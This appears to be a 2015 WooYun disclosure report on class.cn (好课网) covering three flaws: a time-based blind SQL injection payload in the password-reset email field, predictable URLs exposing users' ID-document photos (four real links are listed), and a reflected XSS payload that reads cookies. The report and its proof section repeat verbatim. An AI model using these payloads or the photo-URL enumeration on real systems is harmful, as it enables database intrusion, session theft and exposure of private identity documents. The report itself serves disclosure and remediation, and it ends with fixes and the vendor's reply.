当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0147704

漏洞标题:好课网SQLi/访问控制缺陷/XSS漏洞打包严重泄露师生信息甚至证件信息

相关厂商:好课网

漏洞作者: 路人甲

提交时间:2015-10-19 10:35

修复时间:2015-12-03 10:50

公开时间:2015-12-03 10:50

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-10-19: 细节已通知厂商并且等待厂商处理中
2015-10-19: 厂商已经确认,细节仅向厂商公开
2015-10-29: 细节向核心白帽子及相关领域专家公开
2015-11-08: 细节向普通白帽子公开
2015-11-18: 细节向实习白帽子公开
2015-12-03: 细节向公众公开

简要描述:

见详细说明~

详细说明:

上周末感冒了没出门,所以在家给好课网做一做测试。好课网真心不错,有很多不错的资源,将来发展会很好的。通过测试看得出,好课网的安全做得是很到位的,输入输出过滤、访问控制等方面做得非常专业。
言归正传,说一下这回挖出来的好课网漏洞。打包三个漏洞:
0x01 SQL时间盲注
0x02 访问控制缺陷
0x03 反射型XSS
下面一一介绍。
0x01 SQL时间盲注
URL:http://www.class.cn/reset_passwd/reset_show?key=v3IHUKzcpN7iqrCPsGQ0&[email protected]
注入点为email。
通过测试,发现可以通过拼接字符串进行时间盲注。
注入方法:/reset_passwd/reset_show?key=v3IHUKzcpN7iqrCPsGQ0&[email protected]'%2b(select%20*%20from%20(select%20if(substring(user(),1,1)='b',sleep(10),'a'))a)%2b'
可注入得到当前数据库用户名为:
[email protected]
0x02 访问控制缺陷
通过测试用户身份认证功能发现,证件照片上传的URL为:
http://v2.data.class.cn/class_user/06/08/31/17/cert_6083117.jpg
其中6083117为用户ID,此为公开信息,见下图:

Snip20151019_3.png


用户ID见URL。
通过测试,可得知所有认证用户证件照片可未授权查看,见下例:
http://v2.data.class.cn/class_user/06/08/31/17/cert_6083117.jpg
http://v2.data.class.cn/class_user/06/72/74/40/cert_6727440.jpg
http://v2.data.class.cn/class_user/06/16/75/79/cert_6167579.jpg
http://v2.data.class.cn/class_user/06/47/49/76/cert_6474976.jpg

Snip20151019_4.png


Snip20151019_5.png


Snip20151019_6.png


Snip20151019_7.png


0x03 反射型XSS
由于认证cookie均未配置httponly,因此XSS在这里危害还是比较大的。
URL:http://m.class.cn/course/detail?course_id=1
course_id参数可进行攻击。
http://m.class.cn/course/detail?course_id=1%22%3E%3CScRiPt%3Ealert%28document.cookie%29%3C%2fScRiPt%3E
见下图:
所有cookie:

Snip20151019_9.png


弹窗:

Snip20151019_10.png


以上漏洞利用均点到为止,仅为证明漏洞。

漏洞证明:

上周末感冒了没出门,所以在家给好课网做一做测试。好课网真心不错,有很多不错的资源,将来发展会很好的。通过测试看得出,好课网的安全做得是很到位的,输入输出过滤、访问控制等方面做得非常专业。
言归正传,说一下这回挖出来的好课网漏洞。打包三个漏洞:
0x01 SQL时间盲注
0x02 访问控制缺陷
0x03 反射型XSS
下面一一介绍。
0x01 SQL时间盲注
URL:http://www.class.cn/reset_passwd/reset_show?key=v3IHUKzcpN7iqrCPsGQ0&[email protected]
注入点为email。
通过测试,发现可以通过拼接字符串进行时间盲注。
注入方法:/reset_passwd/reset_show?key=v3IHUKzcpN7iqrCPsGQ0&[email protected]'%2b(select%20*%20from%20(select%20if(substring(user(),1,1)='b',sleep(10),'a'))a)%2b'
可注入得到当前数据库用户名为:
[email protected]
0x02 访问控制缺陷
通过测试用户身份认证功能发现,证件照片上传的URL为:
http://v2.data.class.cn/class_user/06/08/31/17/cert_6083117.jpg
其中6083117为用户ID,此为公开信息,见下图:

Snip20151019_3.png


用户ID见URL。
通过测试,可得知所有认证用户证件照片可未授权查看,见下例:
http://v2.data.class.cn/class_user/06/08/31/17/cert_6083117.jpg
http://v2.data.class.cn/class_user/06/72/74/40/cert_6727440.jpg
http://v2.data.class.cn/class_user/06/16/75/79/cert_6167579.jpg
http://v2.data.class.cn/class_user/06/47/49/76/cert_6474976.jpg

Snip20151019_4.png


Snip20151019_5.png


Snip20151019_6.png


Snip20151019_7.png


0x03 反射型XSS
由于认证cookie均未配置httponly,因此XSS在这里危害还是比较大的。
URL:http://m.class.cn/course/detail?course_id=1
course_id参数可进行攻击。
http://m.class.cn/course/detail?course_id=1%22%3E%3CScRiPt%3Ealert%28document.cookie%29%3C%2fScRiPt%3E
见下图:
所有cookie:

Snip20151019_9.png


弹窗:

Snip20151019_10.png


以上漏洞利用均点到为止,仅为证明漏洞。

修复方案:

针对SQLi:
1、参数化查询;
2、保持权限分离的好习惯。
针对访问控制缺陷:
1、文件名加入随机性,不要直接通过UID命名;
2、最好对普通用户隐藏其他用户UID。
针对XSS:
1、加强过滤;
2、虽然主站对于XSS等攻击防范很到位,m站也应进行同等强度的防护。

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-10-19 10:49

厂商回复:

多谢提交。

最新状态:

2015-10-19:设计的敏感信息图片及地址请删除了吧。

2015-10-19:涉及的敏感信息图片及地址请删除了吧